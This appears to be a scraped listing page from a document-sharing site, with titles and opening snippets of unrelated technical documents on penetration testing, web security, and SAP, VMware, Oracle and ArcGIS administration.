TexSaw Penetration Te st in g What is penetration testing? The process of breaking something or using something for an unintended used case for the purpose of bettering the system or application. This
More informationSetting Up Resources in VMware Identity Manager (SaaS) Modified 15 SEP 2017 VMware Identity Manager
Setting Up Resources in VMware Identity Manager (SaaS) Modified 15 SEP 2017 VMware Identity Manager Setting Up Resources in VMware Identity Manager (SaaS) You can find the most up-to-date technical documentation
More informationSAP Security In-Depth
SAP Security In-Depth by Mariano Nunez Vol. 5 / May 2012 Abstract "SAP platforms are only accessible internally". While that was true in many organizations more than a decade ago, today, driven by modern
More informationInstall and Use the PCD Inspector Tool
How to Install and Use the PCD Inspector Tool ENTERPRISE PORTAL 6.0 SP2 VERSION 1.0 ASAP How to Paper Applicable Releases: EP 6.0 SP2 March 2004. TABLE OF CONTENTS 0 DISCLAIMER...2 1 INTRODUCTION:...2
More informationAdministering Jive Mobile Apps
Administering Jive Mobile Apps Contents 2 Contents Administering Jive Mobile Apps...3 Configuring Jive for Android and ios... 3 Custom App Wrapping for ios... 4 Native App Caching: Android...4 Native App
More informationIntroduction... 5 Configuring Single Sign-On... 7 Prerequisites for Configuring Single Sign-On... 7 Installing Oracle HTTP Server...
Oracle Access Manager Configuration Guide for On-Premises Version 17 October 2017 Contents Introduction... 5 Configuring Single Sign-On... 7 Prerequisites for Configuring Single Sign-On... 7 Installing
More informationArcGIS for Server: Security
DevSummit DC February 11, 2015 Washington, DC Michael Sarhan Esri msarhan@esri.com Agenda Review Basic Security Workflow - ArcGIS Server Roles and Identity Stores - Authentication - Authorization: Securing
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More informationSUN Enterprise Development with iplanet Application Server
SUN 310-540 Enterprise Development with iplanet Application Server 6.0 http://killexams.com/exam-detail/310-540 QUESTION: 96 You just created a new J2EE application (EAR) file using iasdt. How do you begin
More informationIntegrating VMware Workspace ONE with Okta. VMware Workspace ONE
Integrating VMware Workspace ONE with Okta VMware Workspace ONE You can find the most up-to-date technical documentation on the VMware website at: https://docs.vmware.com/ If you have comments about this
More informationSetting Up Resources in VMware Identity Manager (On Premises) Modified on 30 AUG 2017 VMware AirWatch 9.1.1
Setting Up Resources in VMware Identity Manager (On Premises) Modified on 30 AUG 2017 VMware AirWatch 9.1.1 Setting Up Resources in VMware Identity Manager (On Premises) You can find the most up-to-date
More informationBest Practices Using KMC Capabilities in an External Facing Portal Version 1.00 October 2006
Best Practices SAP NetWeaver 2004/2004s Best Practices Using KMC Capabilities in an External Facing Portal Version 1.00 October 2006 Applicable Releases: SAP NetWeaver 2004 and 2004s (Usage Type Enterprise
More informationCisco TEO Adapter Guide for SAP Java
Release 2.3 April 2012 Americas Headquarters Cisco Systems, Inc. 170 West Tasman Drive San Jose, CA 95134-1706 USA http://www.cisco.com Tel: 408 526-4000 800 553-NETS (6387) Fax: 408 527-0883 Text Part
More informationEasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
More informationSetup an NWDI Track for Composition Environment Developments
How-to Guide SAP NetWeaver 7.0 How To Setup an NWDI Track for Composition Environment Developments Version 2.00 January 2008 Applicable Releases: SAP NetWeaver 7.0 SP13 (Custom Development & Unified Life-Cycle
More informationIntegration Service. Admin Console User Guide. On-Premises
Kony Fabric Integration Service Admin Console User Guide On-Premises Release V8 SP1 Document Relevance and Accuracy This document is considered relevant to the Release stated on this title page and the
More informationPerceptive Enterprise Deployment Suite
Perceptive Enterprise Deployment Suite Installation Guide PEDS Version: 1.2 Environment: Windows Written by: Product Documentation, R&D Date: July 2012 2012 Perceptive Software. All rights reserved CaptureNow,
More information1.264 Lecture 14. SOAP, WSDL, UDDI Web services
1.264 Lecture 14 SOAP, WSDL, UDDI Web services Front Page Demo File->New Web (must create on CEE server) Choose Web type Add navigation using Format->Shared Borders (frames) Use top and left, include navigation
More informationExploi'ng Unpatched ios Vulnerabili'es for Fun and Profit
Exploi'ng Unpatched ios Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center (GTISC) 1 Scope of this Presenta;on The process
More informationHow-To Guide SAP NetWeaver Document Version: How To... Configure CM Services in SAP NetWeaver 7.3 and up
How-To Guide SAP NetWeaver Document Version: 1.0-2014-07-03 How To... Configure CM Services in SAP NetWeaver 7.3 and up Document History Document Version Description 1.0 First official release of this
More informationManaging Remote Medical Devices Through The Cloud. Joel K Young SVP of Research and Development & CTO Digi International Friday, September 9 11:30AM
Managing Remote Medical Devices Through The Cloud Joel K Young SVP of Research and Development & CTO Digi International Friday, September 9 11:30AM Overview The Connectivity and Access Problem What information
More informationChat with a hacker. Increase attack surface for Pentest. A talk by Egor Karbutov and Alexey Pertsev
Chat with a hacker Increase attack surface for Pentest A talk by Egor Karbutov and Alexey Pertsev $ Whoarewe Egor Karbutov & Alexey Pertsev Penetration testers @Digital Security Speakers Bug Hunters 2
More informationPattern Recognition and Applications Lab WEB Security. Giorgio Giacinto.
Pattern Recognition and Applications Lab WEB Security Giorgio Giacinto giacinto@diee.unica.it Sicurezza Informa1ca, 2015-2016 Department of Electrical and Electronic Engineering University of Cagliari,
More informationSecuring ArcGIS Server Services An Introduction
2013 Esri International User Conference July 8 12, 2013 San Diego, California Technical Workshop Securing ArcGIS Server Services An Introduction David Cordes & Derek Law Esri - Redlands, CA Agenda Security
More informationTIBCO Cloud Integration Security Overview
TIBCO Cloud Integration Security Overview TIBCO Cloud Integration is secure, best-in-class Integration Platform as a Service (ipaas) software offered in a multi-tenant SaaS environment with centralized
More informationMIS Week 7. Operating System Security. Windows Firewalls
MIS 5170 Operating System Security Week 7 Windows Firewalls Tonight s Plan 2 Questions from Last Week Firewalls Review Quiz Questions Review for 1 st test Assignment 3 Overview Spring Break Test 1 Questions
More information